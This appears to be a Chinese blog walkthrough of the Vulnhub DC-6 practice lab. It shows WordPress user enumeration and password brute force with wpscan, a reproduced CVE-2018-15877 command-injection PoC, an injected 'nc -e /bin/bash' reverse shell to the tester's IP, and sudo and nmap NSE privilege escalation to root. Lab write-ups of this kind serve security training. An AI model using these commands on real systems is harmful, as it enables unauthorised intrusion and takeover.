当前位置: 首页 > news >正文

Vulnhub靶场DC-6练习

news 来源:原创 2024/9/22 6:56:18

目录

  • 0x00 准备
  • 0x01 主机信息收集
  • 0x02 站点信息收集
    • 1. wordpress扫描
    • 2. wordlists字典爆破
  • 0x03 漏洞查找与利用
    • 1. 漏洞查找
    • 2. CVE-2018-15877漏洞利用
    • 3. 反弹shell
    • 5. nmap提权
  • 0x04 总结

0x00 准备


下载链接:https://download.vulnhub.com/dc/DC-6.zip

介绍:CLUE
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. 😉

在Description部分没有什么可以注意的信息,但是CLUE部分有需要注意的内容。给出了一条命令。/usr/share/wordlists/rockyou.txt是kali自带的字典。



0x01 主机信息收集


执行命令:ifconfig
kali本机的ip:192.168.22.48,网卡eth0


发现目标主机ip:netdiscover -i eth0 -r 192.168.22.0/24
目标主机ip:192.168.22.47

在这里插入图片描述


探测目标主机的开放端口:nmap -sS -sV -A -n 192.168.22.47
开放端口:22端口,ssh服务;80端口,Apache httpd 2.4.25

在这里插入图片描述


0x02 站点信息收集


1. wordpress扫描


从上面nmap扫描开放端口的结果来看,80端口,不允许重定向到http://wordy。访问一下这个站点:192.168.22.47,可以看到确实被重定向到了这个站点。

在这里插入图片描述


解决方法就是在/etc/hosts文件中加入:192.168.22.47 wordy

在这里插入图片描述


再次访问就可以正常打开了。

在这里插入图片描述


扫描一下站点的目录结构:dirsearch -u 192.168.22.47

在这里插入图片描述


访问:http://wordy/wp-login.php,发现是wordpress的后台登录界面。考虑找用户名和密码。
kali自带一个专门扫描wordpress的工具wpscan。
利用wpscan枚举站点的账户:wpscan --url http://wordy --enumerate u

在这里插入图片描述


2. wordlists字典爆破


从结果看出,有这五个用户。前面给出的关于这个靶场的线索,有个字典。所以考虑用那个字典对这几个账户进行爆破。
将这几个用户名保存在name6.txt文件中:

在这里插入图片描述



rockyou这个字典需要先解压。
进入目录/usr/share/wordlists,发现rockyou.txt.gz文件。
(第一次使用wordlists字典的话,需要手动安装一下,安装命令:wordlists
执行命令进行解压:gzip -c -d /usr/share/wordlists/rockyou.txt.gz > /usr/share/wordlists/rockyou.txt
解压成功后,再执行线索中给出的命令:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

在这里插入图片描述


再利用wpscan,对这几个账户进行暴力破解,执行命令:wpscan --url [http://](http://xxx/)wordy -P passwords.txt -U name6.txt

在这里插入图片描述


跑出来了一组用户名密码:Username: mark, Password: helpdesk01
从http://wordy/wp-login.php登录进去系统。



0x03 漏洞查找与利用


1. 漏洞查找


这个站点使用了 Activity monitor插件。
执行命令搜索有没有相关的漏洞:searchsploit Activity monitor

在这里插入图片描述


看一下这个文件的内容:cat /usr/share/exploitdb/exploits/php/webapps/45274.html

<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing listDescription:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/PoC:
--><html><!--  Wordpress Plainview Activity Monitor RCE[+] Version: 20161228 and possibly prior[+] Description: Combine OS Commanding and CSRF to get reverse shell[+] Author: LydA(c)ric LEFEBVRE[+] CVE-ID: CVE-2018-15877[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well--><body><script>history.pushState('', '', '/')</script><form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"><input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /><input type="hidden" name="lookup" value="Lookup" /><input type="submit" value="Submit request" /></form></body>
</html>

根据提示信息,查找一些CVE-2018-15877相关的内容。可以实现反弹shell。



2. CVE-2018-15877漏洞利用


在这里输入127.0.0.1,点击lookup,抓包。

在这里插入图片描述


抓包,发送到repeater模块。

在这里插入图片描述


将这个提交的参数改为:127.0.0.1|whoami,可以看到返回了www-data。说明这里可以执行命令。

在这里插入图片描述


3. 反弹shell


现在kali上监听4545端口:nc -lvvp 4545

在这里插入图片描述



构造反弹shell的命令:127.0.0.1|nc -e /bin/bash 192.168.22.48 4545 (kali的ip),点击send。

在这里插入图片描述


在kali中看到监听端口4545成功。

在这里插入图片描述


输入命令进入交互模式:python -c 'import pty;pty.spawn("/bin/bash")’

在这里插入图片描述


进入mark的家目录,可以找到一个things-to-do.txt的文件,看一下文件内容。
看到了graham的账号密码。

在这里插入图片描述


想到开启了22端口。考虑ssh登录到graham账户。密码:GSo7isUM1D4
在kali中重新开一个终端,执行命令:ssh graham@192.168.22.47
成功登录了。

在这里插入图片描述


5. nmap提权


执行命令:sudo -l,查看可以使用的命令。

在这里插入图片描述


从结果可以得到,jens用户可以不用密码就执行/home/jens/backups.sh脚本。
看一下这个脚本的内容,执行命令:cat /home/jens/backups.sh

在这里插入图片描述


这个脚本的作用是解压文件。可以考虑向这个脚本中写入/bin/bash,然后利用jens用户来执行这个脚本。
向这个脚本中写入/bin/bash,执行命令:echo "/bin/bash" >> /home/jens/[backups.sh](http://backups.sh/)
写入成功。

在这里插入图片描述


进入这个脚本所在的目录:cd /home/jens
利用jens用户来执行这个脚本:sudo -u jens ./backups.sh

在这里插入图片描述



已经切换到jens用户了。
再执行 sudo -l 查看可以jens用户可以使用的命令。

在这里插入图片描述


jens用户可以不用密码运行root权限的nmap命令。考虑进行nmap提权。
nmap提权分为两种:旧版本和新版本。
旧版本的利用方式是进入交互模式提权:

# 进入nmap的交互模式
nmap --interactive
# 执行sh,提权成功
!sh

新版本的利用方式:

echo 'os.execute("/bin/sh")' > shellnmap.nse #写一个root shell的文件,调用系统命令执行/bin/bash
sudo nmap --script=shellnmap.nse #运行,nse是nmap的插件的扩展名


这里用新版方式,运行上述两条命令。进入/root目录,可以查看到有theflag.txt文件,查看文件内容即可。

在这里插入图片描述


0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放端口和服务。

站点信息收集:

  1. dirsearch查看网站目录结构。
  2. wpscan扫描wordpress的用户。
  3. wpscan利用wordlists字典爆破密码。

漏洞利用:

  1. Activity monitor插件的漏洞:CVE-2018-15877。
  2. 反弹shell。
  3. nmap提权。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 校园跑腿服务平台的技术实现与案例分析
  • 3-2 多层感知机的从零开始实现
  • 三级_网络技术_14_局域网技术基础及应用
  • JavaScript青少年简明教程:开发工具与运行环境
  • 0302GPIO外设输入功能
  • vue 自定义滚动条同步拖动(移动端)
  • VUE + 小程序 关于前端循环上传附件页面卡死的问题
  • 大模型最新黑书:基于GPT-3、ChatGPT、GPT-4等Transformer架构的自然语言处理 PDF
  • 永磁同步电机控制算法--基于 SVM 的无磁链环 DTC
  • 远程帮客户解决“应用程序无法正常启动0xc000007b,请单击确定关闭应用程序”的问题
  • C# Winform 自定义事件实战
  • 前后端项目部署方案汇总
  • 链接追踪系列-00.es设置日志保存7天-番外篇
  • 对Mapper.xml文件进行深入的学习
  • @SpringBootApplication 注解
  • IE9 : DOM Exception: INVALID_CHARACTER_ERR (5)
  • 【每日笔记】【Go学习笔记】2019-01-10 codis proxy处理流程
  • canvas绘制圆角头像
  • JavaScript服务器推送技术之 WebSocket
  • Java超时控制的实现
  • JS字符串转数字方法总结
  • KMP算法及优化
  • learning koa2.x
  • Less 日常用法
  • maya建模与骨骼动画快速实现人工鱼
  • Mysql优化
  • Python代码面试必读 - Data Structures and Algorithms in Python
  • 记录一下第一次使用npm
  • 七牛云 DV OV EV SSL 证书上线,限时折扣低至 6.75 折!
  • 如何学习JavaEE,项目又该如何做?
  • 少走弯路,给Java 1~5 年程序员的建议
  • 世界编程语言排行榜2008年06月(ActionScript 挺进20强)
  • 学习使用ExpressJS 4.0中的新Router
  • 一些关于Rust在2019年的思考
  • 智能合约Solidity教程-事件和日志(一)
  • 3月7日云栖精选夜读 | RSA 2019安全大会:企业资产管理成行业新风向标,云上安全占绝对优势 ...
  • const的用法,特别是用在函数前面与后面的区别
  • mysql面试题分组并合并列
  • 新海诚画集[秒速5センチメートル:樱花抄·春]
  • ​【原创】基于SSM的酒店预约管理系统(酒店管理系统毕业设计)
  • ​Java并发新构件之Exchanger
  • ​queue --- 一个同步的队列类​
  • ‌移动管家手机智能控制汽车系统
  • (175)FPGA门控时钟技术
  • (2024)docker-compose实战 (8)部署LAMP项目(最终版)
  • (52)只出现一次的数字III
  • (9)STL算法之逆转旋转
  • (C#)Windows Shell 外壳编程系列9 - QueryInfo 扩展提示
  • (c语言)strcpy函数用法
  • (笔试题)合法字符串
  • (力扣记录)1448. 统计二叉树中好节点的数目
  • (一)RocketMQ初步认识
  • (一)utf8mb4_general_ci 和 utf8mb4_unicode_ci 适用排序和比较规则场景
  • (原創) 系統分析和系統設計有什麼差別? (OO)
  • (转)自己动手搭建Nginx+memcache+xdebug+php运行环境绿色版 For windows版